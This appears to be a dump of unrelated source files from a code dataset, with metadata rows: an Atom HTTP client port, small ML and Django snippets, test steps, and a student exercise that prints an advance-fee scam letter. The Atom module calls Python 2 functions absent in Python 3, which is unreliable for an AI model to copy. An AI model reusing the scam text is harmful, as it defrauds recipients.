to the specified end point. An AtomService object or a subclass can be
used to specify information about the request.
"""
__author__ = 'api.jscudder (Jeff Scudder)'
import atom.http_interface
import atom.url
import atom.http
import atom.token_store
import os
import http.client
import urllib.request, urllib.parse, urllib.error
import re
import base64
import socket
import warnings
try:
from xml.etree import cElementTree as ElementTree
except ImportError:
try:
import cElementTree as ElementTree
except ImportError:
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
import atom
class AtomService(object):
"""Performs Atom Publishing Protocol CRUD operations.
The AtomService contains methods to perform HTTP CRUD operations.
"""
# Default values for members
port = 80
ssl = False
# Set the current_token to force the AtomService to use this token
# instead of searching for an appropriate token in the token_store.
current_token = None
auto_store_tokens = True
auto_set_current_token = True
def _get_override_token(self):
return self.current_token
def _set_override_token(self, token):
self.current_token = token
override_token = property(_get_override_token, _set_override_token)
#@atom.v1_deprecated('Please use atom.client.AtomPubClient instead.')
def __init__(self, server=None, additional_headers=None,
application_name='', http_client=None, token_store=None):
"""Creates a new AtomService client.
Args:
server: string (optional) The start of a URL for the server
to which all operations should be directed. Example:
'www.google.com'
additional_headers: dict (optional) Any additional HTTP headers which
should be included with CRUD operations.
http_client: An object responsible for making HTTP requests using a
request method. If none is provided, a new instance of
atom.http.ProxiedHttpClient will be used.
token_store: Keeps a collection of authorization tokens which can be
applied to requests for a specific URLs. Critical methods are
find_token based on a URL (atom.url.Url or a string), add_token,
and remove_token.
"""
self.http_client = http_client or atom.http.ProxiedHttpClient()
self.token_store = token_store or atom.token_store.TokenStore()
self.server = server
self.additional_headers = additional_headers or {}
self.additional_headers['User-Agent'] = atom.http_interface.USER_AGENT % (
application_name,)
# If debug is True, the HTTPConnection will display debug information
self._set_debug(False)
__init__ = atom.v1_deprecated(
'Please use atom.client.AtomPubClient instead.')(
__init__)
def _get_debug(self):
return self.http_client.debug
def _set_debug(self, value):
self.http_client.debug = value
debug = property(_get_debug, _set_debug,
doc='If True, HTTP debug information is printed.')
def use_basic_auth(self, username, password, scopes=None):
if username is not None and password is not None:
if scopes is None:
scopes = [atom.token_store.SCOPE_ALL]
base_64_string = base64.encodestring('%s:%s' % (username, password))
token = BasicAuthToken('Basic %s' % base_64_string.strip(),
scopes=[atom.token_store.SCOPE_ALL])
if self.auto_set_current_token:
self.current_token = token
if self.auto_store_tokens:
return self.token_store.add_token(token)
return True
return False
def UseBasicAuth(self, username, password, for_proxy=False):
"""Sets an Authenticaiton: Basic HTTP header containing plaintext.
Deprecated, use use_basic_auth instead.
The username and password are base64 encoded and added to an HTTP header
which will be included in each request. Note that your username and
password are sent in plaintext.
Args:
username: str
password: str
"""
self.use_basic_auth(username, password)
#@atom.v1_deprecated('Please use atom.client.AtomPubClient for requests.')
def request(self, operation, url, data=None, headers=None,
url_params=None):
if isinstance(url, str):
if url.startswith('http:') and self.ssl:
# Force all requests to be https if self.ssl is True.
url = atom.url.parse_url('https:' + url[5:])
elif not url.startswith('http') and self.ssl:
url = atom.url.parse_url('https://%s%s' % (self.server, url))
elif not url.startswith('http'):
url = atom.url.parse_url('http://%s%s' % (self.server, url))
else:
url = atom.url.parse_url(url)
if url_params:
for name, value in url_params.items():
url.params[name] = value
all_headers = self.additional_headers.copy()
if headers:
all_headers.update(headers)
# If the list of headers does not include a Content-Length, attempt to
# calculate it based on the data object.
if data and 'Content-Length' not in all_headers:
content_length = CalculateDataLength(data)
if content_length:
all_headers['Content-Length'] = str(content_length)
# Find an Authorization token for this URL if one is available.
if self.override_token:
auth_token = self.override_token
else:
auth_token = self.token_store.find_token(url)
return auth_token.perform_request(self.http_client, operation, url,
data=data, headers=all_headers)
request = atom.v1_deprecated(
'Please use atom.client.AtomPubClient for requests.')(
request)
# CRUD operations
def Get(self, uri, extra_headers=None, url_params=None, escape_params=True):
"""Query the APP server with the given URI
The uri is the portion of the URI after the server value
(server example: 'www.google.com').
Example use:
To perform a query against Google Base, set the server to
'base.google.com' and set the uri to '/base/feeds/...', where ... is
your query. For example, to find snippets for all digital cameras uri
should be set to: '/base/feeds/snippets?bq=digital+camera'
Args:
uri: string The query in the form of a URI. Example:
'/base/feeds/snippets?bq=digital+camera'.
extra_headers: dicty (optional) Extra HTTP headers to be included
in the GET request. These headers are in addition to
those stored in the client's additional_headers property.
The client automatically sets the Content-Type and
Authorization headers.
url_params: dict (optional) Additional URL parameters to be included
in the query. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse The server's response to the GET request.
"""
return self.request('GET', uri, data=None, headers=extra_headers,
url_params=url_params)
def Post(self, data, uri, extra_headers=None, url_params=None,
escape_params=True, content_type='application/atom+xml'):
"""Insert data into an APP server at the given URI.
Args:
data: string, ElementTree._Element, or something with a __str__ method
The XML to be sent to the uri.
uri: string The location (feed) to which the data should be inserted.
Example: '/base/feeds/items'.
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type,
Authorization, and Content-Length headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the POST request.
"""
if extra_headers is None:
extra_headers = {}
if content_type:
extra_headers['Content-Type'] = content_type
return self.request('POST', uri, data=data, headers=extra_headers,
url_params=url_params)
def Put(self, data, uri, extra_headers=None, url_params=None,
escape_params=True, content_type='application/atom+xml'):
"""Updates an entry at the given URI.
Args:
data: string, ElementTree._Element, or xml_wrapper.ElementWrapper The
XML containing the updated data.
uri: string A URI indicating entry to which the update will be applied.
Example: '/base/feeds/items/ITEM-ID'
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type,
Authorization, and Content-Length headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the PUT request.
"""
if extra_headers is None:
extra_headers = {}
if content_type:
extra_headers['Content-Type'] = content_type
return self.request('PUT', uri, data=data, headers=extra_headers,
url_params=url_params)
def Delete(self, uri, extra_headers=None, url_params=None,
escape_params=True):
"""Deletes the entry at the given URI.
Args:
uri: string The URI of the entry to be deleted. Example:
'/base/feeds/items/ITEM-ID'
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type and
Authorization headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the DELETE request.
"""
return self.request('DELETE', uri, data=None, headers=extra_headers,
url_params=url_params)
class BasicAuthToken(atom.http_interface.GenericToken):
def __init__(self, auth_header, scopes=None):
"""Creates a token used to add Basic Auth headers to HTTP requests.
Args:
auth_header: str The value for the Authorization header.
scopes: list of str or atom.url.Url specifying the beginnings of URLs
for which this token can be used. For example, if scopes contains
'http://example.com/foo', then this token can be used for a request to
'http://example.com/foo/bar' but it cannot be used for a request to
'http://example.com/baz'
"""
self.auth_header = auth_header
self.scopes = scopes or []
def perform_request(self, http_client, operation, url, data=None,
headers=None):
"""Sets the Authorization header to the basic auth string."""
if headers is None:
headers = {'Authorization':self.auth_header}
else:
headers['Authorization'] = self.auth_header
return http_client.request(operation, url, data=data, headers=headers)
def __str__(self):
return self.auth_header
def valid_for_scope(self, url):
"""Tells the caller if the token authorizes access to the desired URL.
"""
if isinstance(url, str):
url = atom.url.parse_url(url)
for scope in self.scopes:
if scope == atom.token_store.SCOPE_ALL:
return True
if isinstance(scope, str):
scope = atom.url.parse_url(scope)
if scope == url:
return True
# Check the host and the path, but ignore the port and protocol.
elif scope.host == url.host and not scope.path:
return True
elif scope.host == url.host and scope.path and not url.path:
continue
elif scope.host == url.host and url.path.startswith(scope.path):
return True
return False
def PrepareConnection(service, full_uri):
"""Opens a connection to the server based on the full URI.
This method is deprecated, instead use atom.http.HttpClient.request.
Examines the target URI and the proxy settings, which are set as
environment variables, to open a connection with the server. This
connection is used to make an HTTP request.
Args:
service: atom.AtomService or a subclass. It must have a server string which
represents the server host to which the request should be made. It may also
have a dictionary of additional_headers to send in the HTTP request.
full_uri: str Which is the target relative (lacks protocol and host) or
absolute URL to be opened. Example:
'https://www.google.com/accounts/ClientLogin' or
'base/feeds/snippets' where the server is set to www.google.com.
Returns:
A tuple containing the httplib.HTTPConnection and the full_uri for the
request.
"""
deprecation('calling deprecated function PrepareConnection')
(server, port, ssl, partial_uri) = ProcessUrl(service, full_uri)
if ssl:
# destination is https
proxy = os.environ.get('https_proxy')
if proxy:
(p_server, p_port, p_ssl, p_uri) = ProcessUrl(service, proxy, True)
proxy_username = os.environ.get('proxy-username')
if not proxy_username:
proxy_username = os.environ.get('proxy_username')
proxy_password = os.environ.get('proxy-password')
if not proxy_password:
proxy_password = os.environ.get('proxy_password')
if proxy_username:
user_auth = base64.encodestring('%s:%s' % (proxy_username,
proxy_password))
proxy_authorization = ('Proxy-authorization: Basic %s\r\n' % (
user_auth.strip()))
else:
proxy_authorization = ''
proxy_connect = 'CONNECT %s:%s HTTP/1.0\r\n' % (server, port)
user_agent = 'User-Agent: %s\r\n' % (
service.additional_headers['User-Agent'])
proxy_pieces = (proxy_connect + proxy_authorization + user_agent
+ '\r\n')
#now connect, very simple recv and error checking
p_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p_sock.connect((p_server,p_port))
p_sock.sendall(proxy_pieces)
response = ''
# Wait for the full response.
while response.find("\r\n\r\n") == -1:
response += p_sock.recv(8192)
p_status=response.split()[1]
if p_status!=str(200):
raise atom.http.ProxyError('Error status=%s' % p_status)
# Trivial setup for ssl socket.
ssl = socket.ssl(p_sock, None, None)
fake_sock = http.client.FakeSocket(p_sock, ssl)
# Initalize httplib and replace with the proxy socket.
connection = http.client.HTTPConnection(server)
connection.sock=fake_sock
full_uri = partial_uri
else:
connection = http.client.HTTPSConnection(server, port)
full_uri = partial_uri
else:
# destination is http
proxy = os.environ.get('http_proxy')
if proxy:
(p_server, p_port, p_ssl, p_uri) = ProcessUrl(service.server, proxy, True)
proxy_username = os.environ.get('proxy-username')
if not proxy_username:
proxy_username = os.environ.get('proxy_username')
proxy_password = os.environ.get('proxy-password')
if not proxy_password:
proxy_password = os.environ.get('proxy_password')
if proxy_username:
UseBasicAuth(service, proxy_username, proxy_password, True)
connection = http.client.HTTPConnection(p_server, p_port)
if not full_uri.startswith("http://"):
if full_uri.startswith("/"):
full_uri = "http://%s%s" % (service.server, full_uri)
else:
full_uri = "http://%s/%s" % (service.server, full_uri)
else:
connection = http.client.HTTPConnection(server, port)
full_uri = partial_uri
return (connection, full_uri)
def UseBasicAuth(service, username, password, for_proxy=False):
"""Sets an Authenticaiton: Basic HTTP header containing plaintext.
Deprecated, use AtomService.use_basic_auth insread.
The username and password are base64 encoded and added to an HTTP header
which will be included in each request. Note that your username and
password are sent in plaintext. The auth header is added to the
additional_headers dictionary in the service object.
Args:
service: atom.AtomService or a subclass which has an
additional_headers dict as a member.
username: str
password: str
"""
deprecation('calling deprecated function UseBasicAuth')
base_64_string = base64.encodestring('%s:%s' % (username, password))
base_64_string = base_64_string.strip()
if for_proxy:
header_name = 'Proxy-Authorization'
else:
header_name = 'Authorization'
service.additional_headers[header_name] = 'Basic %s' % (base_64_string,)
def ProcessUrl(service, url, for_proxy=False):
"""Processes a passed URL. If the URL does not begin with https?, then
the default value for server is used
This method is deprecated, use atom.url.parse_url instead.
"""
if not isinstance(url, atom.url.Url):
url = atom.url.parse_url(url)
server = url.host
ssl = False
port = 80
if not server:
if hasattr(service, 'server'):
server = service.server
else:
server = service
if not url.protocol and hasattr(service, 'ssl'):
ssl = service.ssl
if hasattr(service, 'port'):
port = service.port
else:
if url.protocol == 'https':
ssl = True
elif url.protocol == 'http':
ssl = False
if url.port:
port = int(url.port)
elif port == 80 and ssl:
port = 443
return (server, port, ssl, url.get_request_uri())
def DictionaryToParamList(url_parameters, escape_params=True):
"""Convert a dictionary of URL arguments into a URL parameter string.
This function is deprcated, use atom.url.Url instead.
Args:
url_parameters: The dictionaty of key-value pairs which will be converted
into URL parameters. For example,
{'dry-run': 'true', 'foo': 'bar'}
will become ['dry-run=true', 'foo=bar'].
Returns:
A list which contains a string for each key-value pair. The strings are
ready to be incorporated into a URL by using '&'.join([] + parameter_list)
"""
# Choose which function to use when modifying the query and parameters.
# Use quote_plus when escape_params is true.
transform_op = [str, urllib.parse.quote_plus][bool(escape_params)]
# Create a list of tuples containing the escaped version of the
# parameter-value pairs.
parameter_tuples = [(transform_op(param), transform_op(value))
for param, value in list((url_parameters or {}).items())]
# Turn parameter-value tuples into a list of strings in the form
# 'PARAMETER=VALUE'.
return ['='.join(x) for x in parameter_tuples]
def BuildUri(uri, url_params=None, escape_params=True):
"""Converts a uri string and a collection of parameters into a URI.
This function is deprcated, use atom.url.Url instead.
Args:
uri: string
url_params: dict (optional)
escape_params: boolean (optional)
uri: string The start of the desired URI. This string can alrady contain
URL parameters. Examples: '/base/feeds/snippets',
'/base/feeds/snippets?bq=digital+camera'
url_parameters: dict (optional) Additional URL parameters to be included
in the query. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
string The URI consisting of the escaped URL parameters appended to the
initial uri string.
"""
# Prepare URL parameters for inclusion into the GET request.
parameter_list = DictionaryToParamList(url_params, escape_params)
# Append the URL parameters to the URL.
if parameter_list:
if uri.find('?') != -1:
# If there are already URL parameters in the uri string, add the
# parameters after a new & character.
full_uri = '&'.join([uri] + parameter_list)
else:
# The uri string did not have any URL parameters (no ? character)
# so put a ? between the uri and URL parameters.
full_uri = '%s%s' % (uri, '?%s' % ('&'.join([] + parameter_list)))
else:
full_uri = uri
return full_uri
def HttpRequest(service, operation, data, uri, extra_headers=None,
url_params=None, escape_params=True, content_type='application/atom+xml'):
"""Performs an HTTP call to the server, supports GET, POST, PUT, and DELETE.
This method is deprecated, use atom.http.HttpClient.request instead.
Usage example, perform and HTTP GET on http://www.google.com/:
import atom.service
client = atom.service.AtomService()
http_response = client.Get('http://www.google.com/')
or you could set the client.server to 'www.google.com' and use the
following:
client.server = 'www.google.com'
http_response = client.Get('/')
Args:
service: atom.AtomService object which contains some of the parameters
needed to make the request. The following members are used to
construct the HTTP call: server (str), additional_headers (dict),
port (int), and ssl (bool).
operation: str The HTTP operation to be performed. This is usually one of
'GET', 'POST', 'PUT', or 'DELETE'
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string.
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, this method will read
a chunk of 100K bytes at a time and send them.
If the data is a list of parts to be sent, each part will be evaluated
and sent.
uri: The beginning of the URL to which the request should be sent.
Examples: '/', '/base/feeds/snippets',
'/m8/feeds/contacts/default/base'
extra_headers: dict of strings. HTTP headers which should be sent
in the request. These headers are in addition to those stored in
service.additional_headers.
url_params: dict of strings. Key value pairs to be added to the URL as
URL parameters. For example {'foo':'bar', 'test':'param'} will
become ?foo=bar&test=param.
escape_params: bool default True. If true, the keys and values in
url_params will be URL escaped when the form is constructed
(Special characters converted to %XX form.)
content_type: str The MIME type for the data being sent. Defaults to
'application/atom+xml', this is only used if data is set.
"""
deprecation('call to deprecated function HttpRequest')
full_uri = BuildUri(uri, url_params, escape_params)
(connection, full_uri) = PrepareConnection(service, full_uri)
if extra_headers is None:
extra_headers = {}
# Turn on debug mode if the debug member is set.
if service.debug:
connection.debuglevel = 1
connection.putrequest(operation, full_uri)
# If the list of headers does not include a Content-Length, attempt to
# calculate it based on the data object.
if (data and 'Content-Length' not in service.additional_headers and
'Content-Length' not in extra_headers):
content_length = CalculateDataLength(data)
if content_length:
extra_headers['Content-Length'] = str(content_length)
if content_type:
extra_headers['Content-Type'] = content_type
# Send the HTTP headers.
if isinstance(service.additional_headers, dict):
for header in service.additional_headers:
connection.putheader(header, service.additional_headers[header])
if isinstance(extra_headers, dict):
for header in extra_headers:
connection.putheader(header, extra_headers[header])
connection.endheaders()
# If there is data, send it in the request.
if data:
if isinstance(data, list):
for data_part in data:
__SendDataPart(data_part, connection)
else:
__SendDataPart(data, connection)
# Return the HTTP Response from the server.
return connection.getresponse()
def __SendDataPart(data, connection):
"""This method is deprecated, use atom.http._send_data_part"""
deprecated('call to deprecated function __SendDataPart')
if isinstance(data, str):
#TODO add handling for unicode.
connection.send(data)
return
elif ElementTree.iselement(data):
connection.send(ElementTree.tostring(data))
return
# Check to see if data is a file-like object that has a read method.
elif hasattr(data, 'read'):
# Read the file and send it a chunk at a time.
while 1:
binarydata = data.read(100000)
if binarydata == '': break
connection.send(binarydata)
return
else:
# The data object was not a file.
# Try to convert to a string and send the data.
connection.send(str(data))
return
def CalculateDataLength(data):
"""Attempts to determine the length of the data to send.
This method will respond with a length only if the data is a string or
and ElementTree element.
Args:
data: object If this is not a string or ElementTree element this funtion
will return None.
"""
if isinstance(data, str):
return len(data)
elif isinstance(data, list):
return None
elif ElementTree.iselement(data):
return len(ElementTree.tostring(data))
elif hasattr(data, 'read'):
# If this is a file-like object, don't try to guess the length.
return None
else:
return len(str(data))
def deprecation(message):
warnings.warn(message, DeprecationWarning, stacklevel=2)
| [
"rjmatthews62@gmail.com"
] | rjmatthews62@gmail.com |
95b961d36c5737ee91cf28899c9db819935a2260 | 8db6b0404f179332e900c09bdb7acbc0779dc250 | /reinforcement_learning/0x00-q_learning/0-load_env.py | 113d10d342b3a1e2dabb244ba52a86677f8b7607 | [] | no_license | chriswill88/holbertonschool-machine_learning | 6f1f900a0e5da013608b4be3e60af15872dc1f99 | 05eabebe5e5c050b1c4a7e1454b947638d883176 | refs/heads/master | 2022-12-30T08:35:50.216909 | 2020-10-18T23:10:23 | 2020-10-18T23:10:23 | 255,544,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | #!/usr/bin/env python3
"""this module contains a function for task 0"""
import gym
def load_frozen_lake(desc=None, map_name=None, is_slippery=False):
"""creates the frozen lake enviroment"""
env = gym.make(
'FrozenLake-v0', desc=desc, map_name=map_name, is_slippery=is_slippery)
return env
| [
"williechri79@gmail.com"
] | williechri79@gmail.com |
d9a98e0727826a2e9368331ebbee230d42859401 | c6da4e00eb27ff33becd0b2f7e962b5cc43f9b20 | /proximal.py | ef75b6639a3640ce62538b70545bdfd4dc29a26f | [] | no_license | cyber-meow/FISTA | 93c61653e55e9b02eb5659cc8e60f17da7f8bb71 | c85d5364083ab69f1476b225f6b71713ac4c02dd | refs/heads/master | 2020-04-13T21:15:55.119870 | 2019-01-02T17:09:36 | 2019-01-02T17:09:36 | 163,451,363 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | import numpy as np
import torch
import pywt
def soft_thresholding(x, th):
return np.sign(x) * np.maximum(np.abs(x)-th, 0)
class SoftThresholding(object):
def __init__(self, lamb):
self.lamb = lamb
def __call__(self, x, gamma):
th = self.lamb * gamma
device = 'cuda' if x.is_cuda else 'cpu'
x = soft_thresholding(x.cpu().detach().numpy(), th)
x = torch.tensor(x, dtype=torch.float, requires_grad=True).to(device)
return x
class WaveletST(object):
def __init__(self, lamb, wavelet='db4'):
self.lamb = lamb
self.wavelet = wavelet
def __call__(self, x, gamma):
th = self.lamb * gamma
device = 'cuda' if x.is_cuda else 'cpu'
x_wav = pywt.wavedec2(x.cpu().detach().numpy(), self.wavelet)
x_wav[0] = soft_thresholding(x_wav[0], th)
for i, coeffs in enumerate(x_wav[1:]):
cH = soft_thresholding(coeffs[0], th)
cV = soft_thresholding(coeffs[1], th)
cD = soft_thresholding(coeffs[2], th)
x_wav[i+1] = cH, cV, cD
x = pywt.waverec2(x_wav, self.wavelet)
return torch.tensor(
x, dtype=torch.float,
requires_grad=True).to(device)
class ProjectInf(object):
def __init__(self, lamb):
self.lamb = lamb
def __call__(self, x, gamma):
return torch.clamp(x, -self.lamb, self.lamb)
| [
"sjungle305@gmail.com"
] | sjungle305@gmail.com |
617a6254379110f96f106c107563e54e1020e433 | 4fdab62336c7b4bde236351fabdd79cdec0b3d20 | /post_questions/forms.py | 4c4c245e3a02abe390e3f312eabf270eee9106b9 | [] | no_license | aashiqms/ask_new | 8e6f76fbe41da68d32967c5ab3a14a76d469f50d | 7f7a5e1b5e9b498030415607b8419e90147cd597 | refs/heads/master | 2022-07-04T21:51:56.107360 | 2020-05-17T18:03:19 | 2020-05-17T18:03:19 | 264,604,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from django import forms
from post_questions.models import Post, Comment, Answer
from django.forms import ModelForm
class QuestionForm(ModelForm):
class Meta:
model = Post
fields = ['author', 'questions']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
class CommentForm(ModelForm):
class Meta:
model = Comment
fields = ['author', 'text']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
class AnswerForm(ModelForm):
class Meta:
model = Answer
fields = ['author', 'text']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
form = QuestionForm()
form_A = AnswerForm()
| [
"aashiqms@outlook.com"
] | aashiqms@outlook.com |
c49b0c124c8eeb7a4917b06d1acffade30e7bf1f | 72df811521e3da73187388c737599ddd0a4631fc | /START_PYTHON/4日/11.バンボクムンwhile/03.while.py | 4bc0180ed23f1f2e825dba7d5922b98565f5a4a0 | [] | no_license | munsangu/20190615python | e7480044cfa07dcb65e8ca168c7cf9ecb73ffe7a | c496bc471503ac0e2ba0d928c01085c8b569d173 | refs/heads/master | 2020-06-04T14:59:49.822865 | 2020-02-08T11:49:16 | 2020-02-08T11:49:16 | 192,071,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | # 내가 원하는 만큼 입력받고 그 숫자의 평균을 구하는 프로그램
num = 1
count = 0
sum = 0
while num !=0: #num이 0이 아니면 반복
num = int(input("정수 입력: "))
count += 1 # 몇 번 입력받았는지 count
sum += num
count -= 1 # 0을 입력한 count 하나 제외
avg = sum / count
print("평균 : %.2f"%avg)
| [
"ds-3632@hanmail.net"
] | ds-3632@hanmail.net |
50a7fad07fc0b5935c80ee5dfac6b9b8555e9a9d | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/swnrei001/question3.py | 4e473093a1d821898c258c5628e999860a896c5f | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | def spam():
firstname = input("Enter first name:\n")
lastname = input("Enter last name:\n")
money = eval(input("Enter sum of money in USD:\n"))
country = input("Enter country name:\n")
letter = """Dearest """ + firstname + """\nIt is with a heavy heart that I inform you of the death of my father,
General Fayk """ + lastname + """, your long lost relative from Mapsfostol.
My father left the sum of """ + str(money) + """USD for us, your distant cousins.
Unfortunately, we cannot access the money as it is in a bank in """ + country + """.
I desperately need your assistance to access this money.
I will even pay you generously, 30% of the amount - """ + str(money * 0.3) + """USD,
for your help. Please get in touch with me at this email address asap.
Yours sincerely
Frank """ + lastname
print()
print(letter)
spam() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
e7371d1f3476d8e3b2d7580d5f8194845330d249 | b66c12a4304c6af00d58a1f83e453dbc739ae60d | /survey/features/about_us_steps.py | 3d0b8c9390b1acfe7127b065e4d6a78de8c6afde | [
"BSD-2-Clause"
] | permissive | madhavaramu/uSurvey | 060dae008f975a7cdb77ef8b0c5d820842422637 | 681e1d91fbedf94e840858e1ef09538777ce3e50 | refs/heads/uSurvey | 2020-04-11T06:28:17.220192 | 2016-12-06T13:24:45 | 2016-12-06T13:24:45 | 68,372,980 | 0 | 1 | null | 2016-09-16T11:03:44 | 2016-09-16T11:03:43 | null | UTF-8 | Python | false | false | 1,563 | py | from lettuce import *
from survey.features.page_objects.root import AboutPage, EditAboutUsPage
from survey.models import AboutUs
@step(u'And I visit the about us page')
def and_i_visit_the_about_us_page(step):
world.page = AboutPage(world.browser)
world.page.visit()
@step(u'And I have about us content')
def and_i_have_about_us_content(step):
world.about_us = AboutUs.objects.create(content="blah blah")
@step(u'Then I should see the sample about us information')
def then_i_should_see_the_sample_about_us_information(step):
world.page.is_text_present(world.about_us.content)
@step(u'When I click the edit link')
def when_i_click_the_edit_link(step):
world.page.click_by_css("#edit-about_us")
@step(u'Then I should see the existing content in a text area')
def then_i_should_see_the_existing_content_in_a_text_area(step):
world.page = EditAboutUsPage(world.browser)
world.form_data = {'content': world.about_us.content}
world.page.validate_form_values(world.form_data)
@step(u'When I modify about us content')
def when_i_modify_about_us_content(step):
world.form_data = {'content': "edited more blah blah blah"}
world.page.fill_wywget_textarea(world.form_data)
@step(u'Then I should see the content was updated successfully')
def then_i_should_see_the_content_was_updated_successfully(step):
world.page.see_success_message("About us content", "updated")
@step(u'And I should not see the edit about us button')
def and_i_should_not_see_the_edit_about_us_button(step):
world.page.assert_edit_link_absent() | [
"antsmc2@yahoo.com"
] | antsmc2@yahoo.com |
290920be930c40942829f4f4ddb96f55ae5fd5a5 | ca1c2630b517c2dd69ecb2741174c5147feea638 | /mercury/null_byte_filter.py | 1f5f05e6f372805662128a1c6598ba31b362b23f | [] | no_license | dexter-taylor/mercury | 708cf0440016d05e8c3754e82471d8b6e2ab5589 | efb02177ac12747d65aba43b47541d548fd5bdeb | refs/heads/master | 2020-04-18T14:25:43.808775 | 2019-01-25T06:59:08 | 2019-01-25T06:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py | #!/usr/bin/env python
'''Usage:
null_byte_filter.py (-n | -d | -l) <datafile>
Options:
-n --null Retrieve the line numbers of the lines with null bytes ('\0') and the first field in that line containing a null byte
-d --readable_dict Retrieve the lines that can be read by a csv reader (do not contain null bytes) and return lines as dictionaries
-l --readable_line Retrieve readable lines and just return line
'''
import docopt
import datamap as dmap
from snap import common
from xcsv import Dictionary2CSVProcessor
def main(args):
src_file = args.get('<datafile>')
null_mode = args.get('--null')
readable_dict_mode = args.get('--readable_dict')
readable_line_mode = args.get('--readable_line')
with open(src_file) as f:
first_line = f.readline()
fields = first_line.split('|')
nb_reporter = dmap.NullByteFilter(delimiter='|', field_names=fields)
if null_mode:
null_pairs = nb_reporter.filter_with_null_output(src_file)
for null_pair in null_pairs:
print(common.jsonpretty({'line_number': null_pair[0],
'field': null_pair[1]
}))
elif readable_dict_mode:
readable_lines = nb_reporter.filter_with_readable_output(src_file)
for line in readable_lines:
if line == first_line:
continue
record_dict = {}
value_array = line.split('|')
for r_index, field in enumerate(fields):
record_dict[field] = value_array[r_index]
print(common.jsonpretty(record_dict))
elif readable_line_mode:
proc = Dictionary2CSVProcessor(fields, "|", dmap.WhitespaceCleanupProcessor())
readable_lines = nb_reporter.filter_with_readable_output(src_file)
for line in readable_lines:
if line == first_line:
continue
record_dict = {}
value_array = line.split('|')
for r_index, field in enumerate(fields):
record_dict[field] = value_array[r_index]
proc.process(record_dict)
else:
print("Choose an option flag for record info output")
if __name__ == '__main__':
args = docopt.docopt(__doc__)
main(args)
| [
"binarymachineshop@gmail.com"
] | binarymachineshop@gmail.com |
6bd691bc3b1822dbfe4648cc8c79382b20c34e6b | d6d874fe9e1607a859e9484fdc5bce09b3f76472 | /Pipeline/the_LATEST/sys_PY/py_MODULES/hdrprocess_old/view/mainWindow.py | bbbde9578041fba60f361228ee9e0bea1b9844e0 | [] | no_license | tws0002/pop2-project | c80095cc333195ebb9ffa2199e2c3a3446d0df0c | 6886f05d54ec77b66d13b4eaafe8a66ac49f2f41 | refs/heads/master | 2021-01-11T20:53:19.982950 | 2016-03-10T10:31:29 | 2016-03-10T10:31:29 | 79,202,989 | 1 | 1 | null | 2017-01-17T07:56:09 | 2017-01-17T07:56:09 | null | UTF-8 | Python | false | false | 20,069 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/selecaotwo/Dropbox/Private/my_PROJECT/proj_POP2/Pipeline/the_LATEST/sys_PY/py_MODULES/hdrprocess/view/mainWindow.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# Qt bindings: prefer PyQt4 (this file was generated by the PyQt4 UI code
# generator, pyuic4), falling back to PySide, which exposes an
# API-compatible QtCore/QtGui.  The original code imported the nonexistent
# package name "PyQt", so the first branch could never succeed; the
# trailing bare `except: raise` was a no-op and has been dropped.
try:
    import PyQt4.QtCore as QtCore
    import PyQt4.QtGui as QtGui
except ImportError:
    import PySide.QtCore as QtCore
    import PySide.QtGui as QtGui
# Compatibility shim: PyQt4 exposes QString.fromUtf8; PySide (and PyQt4
# API v2) does not, in which case strings are already unicode and pass
# through unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s
